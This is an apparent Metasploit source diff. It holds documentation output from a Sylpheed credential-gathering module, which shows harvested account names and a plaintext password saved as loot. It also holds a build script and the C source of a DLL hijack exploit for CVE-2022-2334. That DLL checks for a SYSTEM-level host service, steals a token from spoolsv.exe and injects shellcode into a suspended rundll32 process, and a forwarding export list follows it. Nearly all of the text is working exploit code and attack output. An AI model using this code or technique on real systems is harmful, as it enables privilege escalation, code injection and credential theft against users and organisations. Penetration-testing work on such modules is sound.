+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_852103.2
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_342490.2
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_575350.3
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_038250.3
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_Sylpheedaccountr_780534.4
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_554415.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Sylpheed's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Sylpheed's base folder found
+[*] Found the folder containing specified artifact for accountrc.
+[*] Sylpheed's Accountrc file found
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_913568.bin
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_EXTRACTIONaccoun_539546.bin
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_194058.1
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_583721.1
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_972346.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_967284.bak
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_879167.2
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_021730.2
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_102901.3
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_544427.3
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_309871.4
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_902434.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+
+```
@@ -0,0 +1,7 @@
+#!/bin/sh
+CCx64="x86_64-w64-mingw32"
+
+${CCx64}-gcc -shared -o temp.dll template.def template.c
+${CCx64}-strip -s temp.dll -o ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll
+rm -f temp.dll *.o
+chmod -x ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll
@@ -0,0 +1,241 @@
+#include <windows.h>
+#include <sddl.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include <userenv.h>
+
+#include "template.h"
+
+void ExecutePayload(HANDLE hDll);
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+    switch (dwReason) {
+    case DLL_PROCESS_ATTACH:
+        ExecutePayload(hDll);
+        break;
+
+        case DLL_PROCESS_DETACH:
+        break;
+
+        case DLL_THREAD_ATTACH:
+        break;
+
+        case DLL_THREAD_DETACH:
+        break;
+    }
+    return TRUE;
+}
+
+BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
+    int result;
+
+    if (strlen(szStr) < strlen(szSuffix)) {
+        return FALSE;
+    }
+    if (bCaseSensitive) {
+        result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+    }
+    else {
+        result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+    }
+    return result == 0;
+}
+
+BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
+    HANDLE hToken;
+    DWORD dwLength = 0;
+    TOKEN_USER *tuUser = NULL;
+    SIZE_T szSid = 0;
+
+    *pSid = NULL;
+    if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
+        return FALSE;
+    }
+
+    GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
+    tuUser = (TOKEN_USER *)malloc(dwLength);
+    if (!tuUser) {
+        return FALSE;
+    }
+
+    if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
+        free(tuUser);
+        return FALSE;
+    }
+
+    szSid = GetLengthSid(tuUser->User.Sid);
+    *pSid = LocalAlloc(LPTR, szSid);
+    if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) {
+        LocalFree(*pSid);
+        *pSid = NULL;
+    }
+
+    free(tuUser);
+    CloseHandle(hToken);
+    return *pSid != NULL;
+}
+
+BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
+    PSID pTestSid = NULL;
+    PSID pTargetSid = NULL;
+
+    if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
+        return FALSE;
+    }
+
+    if (!GetProcessSid(hProc, &pTestSid)) {
+        LocalFree(pTargetSid);
+        return FALSE;
+    }
+
+    *pbResult = EqualSid(pTestSid, pTargetSid);
+    LocalFree(pTargetSid);
+    LocalFree(pTestSid);
+    return TRUE;
+}
+
+DWORD FindProcessId(LPCTSTR szProcessName) {
+    HANDLE hProcessSnap;
+    PROCESSENTRY32 pe32;
+    DWORD result = 0;
+
+    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (hProcessSnap == INVALID_HANDLE_VALUE) {
+        return 0;
+    }
+
+    pe32.dwSize = sizeof(PROCESSENTRY32);
+    if (!Process32First(hProcessSnap, &pe32)) {
+        CloseHandle(hProcessSnap);
+        return 0;
+    }
+
+    do {
+        if (!strcmp(szProcessName, pe32.szExeFile)) {
+            result = pe32.th32ProcessID;
+            break;
+        }
+    } while (Process32Next(hProcessSnap, &pe32));
+    CloseHandle(hProcessSnap);
+    return result;
+}
+
+HANDLE GetPayloadToken(void) {
+    HANDLE hTokenHandle = NULL;
+    HANDLE hProcessHandle = NULL;
+    BOOL bIsSystem = FALSE;
+    DWORD dwPid = 0;
+    CHAR Path[MAX_PATH + 1];
+
+    ZeroMemory(Path, sizeof(Path));
+    GetModuleFileNameA(NULL, Path, MAX_PATH);
+    if (!StringEndsWithStringA(Path, "\\dataFEEDSISsvc.exe", TRUE)) {
+        return NULL;
+    }
+    /* loaded into the context of dataFEEDSISsvc.exe */
+
+    if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
+        return NULL;
+    }
+    /* and running as NT_AUTHORITY SYSTEM */
+
+    dwPid = FindProcessId("spoolsv.exe");
+    if (!dwPid) {
+        return NULL;
+    }
+
+    hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
+    if (!hProcessHandle) {
+        return NULL;
+    }
+
+    bIsSystem = FALSE;
+    if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
+        return NULL;
+    }
+    /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
+
+    OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
+    CloseHandle(hProcessHandle);
+    return hTokenHandle;
+}
+
+DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
+    /* wait for the process to exit or 10 seconds before cleaning up */
+    WaitForSingleObject(pExploitData->hProcess, 10000);
+    CloseHandle(pExploitData->hProcess);
+    CloseHandle(pExploitData->hMutex);
+
+    /* this does not return */
+    FreeLibraryAndExitThread(pExploitData->hModule, 0);
+    return 0;
+}
+
+void ExecutePayload(HANDLE hDll) {
+    PROCESS_INFORMATION pi;
+    STARTUPINFO si;
+    CONTEXT ctx;
+    LPVOID ep;
+    SECURITY_ATTRIBUTES MutexAttributes;
+    SIZE_T dwBytesWritten = 0;
+    PEXPLOIT_DATA pExploitData = NULL;
+    HANDLE hToken;
+
+    pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
+    if (!pExploitData) {
+        return;
+    }
+
+    /* keep a reference to the module for synchronization purposes */
+    GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
+
+    ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
+    MutexAttributes.nLength = sizeof(MutexAttributes);
+    MutexAttributes.bInheritHandle = TRUE; // inherit the handle
+    pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
+    if (!pExploitData->hMutex) {
+        return;
+    }
+
+    if (GetLastError() == ERROR_ALREADY_EXISTS) {
+        CloseHandle(pExploitData->hMutex);
+        return;
+    }
+
+    if (GetLastError() == ERROR_ACCESS_DENIED) {
+        CloseHandle(pExploitData->hMutex);
+        return;
+    }
+
+    hToken = GetPayloadToken();
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    /* start up the payload in a new process */
+    if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+        ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
+        GetThreadContext(pi.hThread, &ctx);
+        ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
+        if (dwBytesWritten == SCSIZE) {
+
+#ifdef _WIN64
+            ctx.Rip = (DWORD64)ep;
+#else
+            ctx.Eip = (DWORD)ep;
+#endif
+
+            SetThreadContext(pi.hThread, &ctx);
+            ResumeThread(pi.hThread);
+
+            CloseHandle(pi.hThread);
+            pExploitData->hProcess = pi.hProcess;
+        }
+    }
+
+    if (hToken) {
+        CloseHandle(hToken);
+    }
+    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
+}
@@ -0,0 +1,1398 @@
+EXPORTS
+    ??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@$$QEAV0@@Z @1
+    ??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@AEAV0@@Z @2
+    ??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0?$CLockableFlexArray@VCStaticCritSec@@@@QEAA@XZ @3
+    ??0?$SZLess@PEBG@@QEAA@AEBU0@@Z=C:/Windows/System32/wbemcomn.??0?$SZLess@PEBG@@QEAA@AEBU0@@Z @4
+    ??0?$SZLess@PEBG@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0?$SZLess@PEBG@@QEAA@XZ @5
+    ??0C9XAce@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0C9XAce@@QEAA@AEBV0@@Z @6
+    ??0C9XAce@@QEAA@KKKPEAG@Z=C:/Windows/System32/wbemcomn.??0C9XAce@@QEAA@KKKPEAG@Z @7
+    ??0C9XAce@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0C9XAce@@QEAA@XZ @8
+    ??0CAbstractQl1Parser@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CAbstractQl1Parser@@QEAA@AEBV0@@Z @9
+    ??0CAbstractQl1Parser@@QEAA@PEAVCGenLexSource@@@Z=C:/Windows/System32/wbemcomn.??0CAbstractQl1Parser@@QEAA@PEAVCGenLexSource@@@Z @10
+    ??0CArena@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CArena@@QEAA@$$QEAV0@@Z @11
+    ??0CArena@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CArena@@QEAA@AEBV0@@Z @12
+    ??0CArena@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CArena@@QEAA@XZ @13
+    ??0CBaseAce@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CBaseAce@@QEAA@AEBV0@@Z @14
+    ??0CBaseAce@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CBaseAce@@QEAA@XZ @15
+    ??0CBasicUnloadInstruction@@IEAA@XZ=C:/Windows/System32/wbemcomn.??0CBasicUnloadInstruction@@IEAA@XZ @16
+    ??0CBasicUnloadInstruction@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CBasicUnloadInstruction@@QEAA@AEBV0@@Z @17
+    ??0CBasicUnloadInstruction@@QEAA@VCWbemInterval@@@Z=C:/Windows/System32/wbemcomn.??0CBasicUnloadInstruction@@QEAA@VCWbemInterval@@@Z @18
+    ??0CBuffer@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CBuffer@@QEAA@AEBV0@@Z @19
+    ??0CBuffer@@QEAA@PEAEKH@Z=C:/Windows/System32/wbemcomn.??0CBuffer@@QEAA@PEAEKH@Z @20
+    ??0CCheckedInCritSec@@QEAA@PEAVCCritSec@@@Z=C:/Windows/System32/wbemcomn.??0CCheckedInCritSec@@QEAA@PEAVCCritSec@@@Z @21
+    ??0CCircularQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CCircularQueue@@QEAA@XZ @22
+    ??0CClientOpsNode@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CClientOpsNode@@QEAA@XZ @23
+    ??0CContainerControl@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CContainerControl@@QEAA@$$QEAV0@@Z @24
+    ??0CContainerControl@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CContainerControl@@QEAA@AEBV0@@Z @25
+    ??0CContainerControl@@QEAA@PEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.??0CContainerControl@@QEAA@PEAUIUnknown@@@Z @26
+    ??0CCritSec@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CCritSec@@QEAA@XZ @27
+    ??0CDMTFParser@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0CDMTFParser@@QEAA@PEBG@Z @28
+    ??0CDatePart@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CDatePart@@QEAA@XZ @29
+    ??0CDateTimeParser@@IEAA@XZ=C:/Windows/System32/wbemcomn.??0CDateTimeParser@@IEAA@XZ @30
+    ??0CDateTimeParser@@QEAA@PEBG@Z=C:/Windows/System32/wbemcomn.??0CDateTimeParser@@QEAA@PEBG@Z @31
+    ??0CEnterWbemCriticalSection@@QEAA@PEAVCWbemCriticalSection@@K@Z=C:/Windows/System32/wbemcomn.??0CEnterWbemCriticalSection@@QEAA@PEAVCWbemCriticalSection@@K@Z @32
+    ??0CEventLog@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CEventLog@@QEAA@AEBV0@@Z @33
+    ??0CEventLog@@QEAA@PEBGAEBU_GUID@@K@Z=C:/Windows/System32/wbemcomn.??0CEventLog@@QEAA@PEBGAEBU_GUID@@K@Z @34
+    ??0CEventLogRecord@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CEventLogRecord@@QEAA@AEAV0@@Z @35
+    ??0CEventLogRecord@@QEAA@GAEBU_EVENT_DESCRIPTOR@@VCInsertionString@@111111111@Z=C:/Windows/System32/wbemcomn.??0CEventLogRecord@@QEAA@GAEBU_EVENT_DESCRIPTOR@@VCInsertionString@@111111111@Z @36
+    ??0CExecQueue@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CExecQueue@@QEAA@AEAV0@@Z @37
+    ??0CExecQueue@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CExecQueue@@QEAA@XZ @38
+    ??0CExecRequest@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CExecRequest@@QEAA@AEBV0@@Z @39
+    ??0CExecRequest@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CExecRequest@@QEAA@XZ @40
+    ??0CFlexArray@@QEAA@AEAV0@@Z=C:/Windows/System32/wbemcomn.??0CFlexArray@@QEAA@AEAV0@@Z @41
+    ??0CFlexArray@@QEAA@HH@Z=C:/Windows/System32/wbemcomn.??0CFlexArray@@QEAA@HH@Z @42
+    ??0CFlexQueue@@QEAA@H@Z=C:/Windows/System32/wbemcomn.??0CFlexQueue@@QEAA@H@Z @43
+    ??0CHaltable@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CHaltable@@QEAA@AEBV0@@Z @44
+    ??0CHaltable@@QEAA@XZ=C:/Windows/System32/wbemcomn.??0CHaltable@@QEAA@XZ @45
+    ??0CHex@@QEAA@J@Z=C:/Windows/System32/wbemcomn.??0CHex@@QEAA@J@Z @46
+    ??0CIdentitySecurity@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CIdentitySecurity@@QEAA@AEBV0@@Z @47
+    ??0CIdentitySecurity@@QEAA@_N@Z=C:/Windows/System32/wbemcomn.??0CIdentitySecurity@@QEAA@_N@Z @48
+    ??0CIdentityTest@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CIdentityTest@@QEAA@AEBV0@@Z @49
+    ??0CIdentityTest@@QEAA@PEAVCTimerInstruction@@@Z=C:/Windows/System32/wbemcomn.??0CIdentityTest@@QEAA@PEAVCTimerInstruction@@@Z @50
+    ??0CInCritSec@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z=C:/Windows/System32/wbemcomn.??0CInCritSec@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z @51
+    ??0CInsertionString@@QEAA@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@$$QEAV0@@Z @52
+    ??0CInsertionString@@QEAA@AEBV0@@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@AEBV0@@Z @53
+    ??0CInsertionString@@QEAA@J@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@J@Z @54
+    ??0CInsertionString@@QEAA@PEBD@Z=C:/Windows/System32/wbemcomn.??0CInsertionString@@QEAA@PEBD@Z @55
